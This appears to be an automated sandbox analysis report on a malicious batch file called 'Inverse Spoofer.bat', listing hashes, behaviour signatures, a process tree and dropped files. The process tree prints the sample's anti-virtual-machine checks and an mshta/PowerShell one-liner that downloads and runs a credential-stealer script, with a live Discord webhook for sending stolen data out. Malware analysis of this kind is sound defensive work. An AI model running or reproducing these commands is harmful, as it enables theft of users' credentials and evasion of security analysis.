Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/05/2024, 19:32

General

  • Target

    Inverse Spoofer.bat

  • Size

    3.6MB

  • MD5

    1993658619a8d5ba60491f5b2fb85339

  • SHA1

    2e281ef8074e2bb71c065e515e1f2cdad18f2b65

  • SHA256

    420f833ebca48b057f60204a321a7b5e0500d231d5519834787d0498734bc5de

  • SHA512

    7fccdb7e86d95c01e2f2c0fc872eb99063c1cf6f97ec7a1e30431b31bbd89eebba9ba465e464552b3d587e61ab58ae233d86817f89c117d7f74bfe4d2400f5a2

  • SSDEEP

    6144:yWVEK5u+fJwY/OwIT2dahoPeY13mssMAIsW3lElCConI:yWuKw45jw2Ehn6vsMtLyonI

Score
7/10

Malware Config

Signatures

  • Drops startup file 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:2336
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:3056
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1936
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get manufacturer /value
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2512
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:2524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2580
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:2452
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:2396
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2708
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:1452
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2144
    • C:\Windows\system32\chcp.com
      chcp 65001
      2⤵
      PID:2140
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:1680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:604
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:1928
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:828
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:2160
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2244
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1740
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:2340
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1488
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:820
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:280
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2840
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:2948
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:1648
    • C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Inverse Spoofer.bat"
      2⤵
      PID:2640
    • C:\Windows\system32\doskey.exe
      doskey /listsize=0
      2⤵
      PID:2548
    • C:\Windows\system32\net.exe
      net session
      2⤵
      PID:2416
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
        PID:1940
    • C:\Windows\system32\mshta.exe
      mshta
      2⤵
      PID:2620
    • C:\Windows\system32\mshta.exe
      mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1233425449405644874/vNZG29_aqrS5-6_cEZagubWOBE70X-G9ljYRHQhwde6gbqIzouyhYkH-xjXVc7vySWYK' | iex",0))
      2⤵
      • Modifies Internet Explorer settings
      PID:2252
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1233425449405644874/vNZG29_aqrS5-6_cEZagubWOBE70X-G9ljYRHQhwde6gbqIzouyhYkH-xjXVc7vySWYK' | iex
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2436

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\kdotZhHGF.bat

    Filesize

    13B

    MD5

    337065424ed27284c55b80741f912713

    SHA1

    0e99e1b388ae66a51a8ffeee3448c3509a694db8

    SHA256

    4ef6f5f73f87cd552bf0dceb245365c44996f94eb72aeb2ccefe440fe055043b

    SHA512

    d9290f0aa33e11da2ec88165b8133623e3f1633a9df8f477dfab395f655dc9a1d2dc82e8eae1d8eeae950ea2dd1e08054e1b258a0f2a0b4d4ca124db08e42e5a

  • C:\Users\Admin\AppData\Local\Temp\kdotZhHGF.bat

    Filesize

    91B

    MD5

    8d39bd87139ebe57d2f1d916e907886b

    SHA1

    b14667ff79adab3b227f1a4fc468aa10320eb88b

    SHA256

    0a46a0ae7013f707b6539f13529a0e706845b23a6c77ec6ddb6d71f9186686e8

    SHA512

    b62ce28dff368a7ec11eac544e66fbbfba27e688ac6cceeda01d7f26e32ed87d814a64a753e9fe1f876a97394a4ca0eaca764a42aaddba881a0a8e29c6f48448

  • C:\Users\Admin\AppData\Local\Temp\kdotmgVbKy.bat

    Filesize

    182B

    MD5

    15ba9773acc628a3d7a219bd5237cf78

    SHA1

    64b395ca9d2d7976a6b0023a09a799163acb7280

    SHA256

    1d07fc24d284d0b8c68f5e995a7b8cf97d94ffc3ec3d203596c236bb40295ae1

    SHA512

    1ba60dcae51a797c7e0d68051673954d4728986789dc98aa935817c5c808389885696e7bd06f01ea885a4eefa62a71a1561bcca53a6b964f240331931c3db9a5

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    4d89ff10d87d1c8eaf9033c85a98bde8

    SHA1

    74e1b16b31b00f12a8485455ab5a239aabfbd81b

    SHA256

    8dab4e1908ea7352a2b340cdbc377785e1f4a396ef39ffb909d418db12f28ed1

    SHA512

    08b971f4917ae2bd0c607c05c21216fdb0e9d6791b43381ac7aec568aea541b7868c87be3900a466e3ada7489d6e2c22aed3cfbd0a9c6f56835696a35ab40e7a

  • memory/2580-31-0x0000000001E34000-0x0000000001E37000-memory.dmp

    Filesize

    12KB

  • memory/2580-30-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp

    Filesize

    9.6MB

  • memory/2580-32-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp

    Filesize

    9.6MB

  • memory/2580-29-0x000007FEF4FD0000-0x000007FEF596D000-memory.dmp

    Filesize

    9.6MB

  • memory/2580-28-0x0000000002350000-0x0000000002358000-memory.dmp

    Filesize

    32KB

  • memory/2580-27-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2580-26-0x000007FEF528E000-0x000007FEF528F000-memory.dmp

    Filesize

    4KB

  • memory/2708-60-0x000000001B580000-0x000000001B862000-memory.dmp

    Filesize

    2.9MB

  • memory/2708-61-0x0000000002960000-0x0000000002968000-memory.dmp

    Filesize

    32KB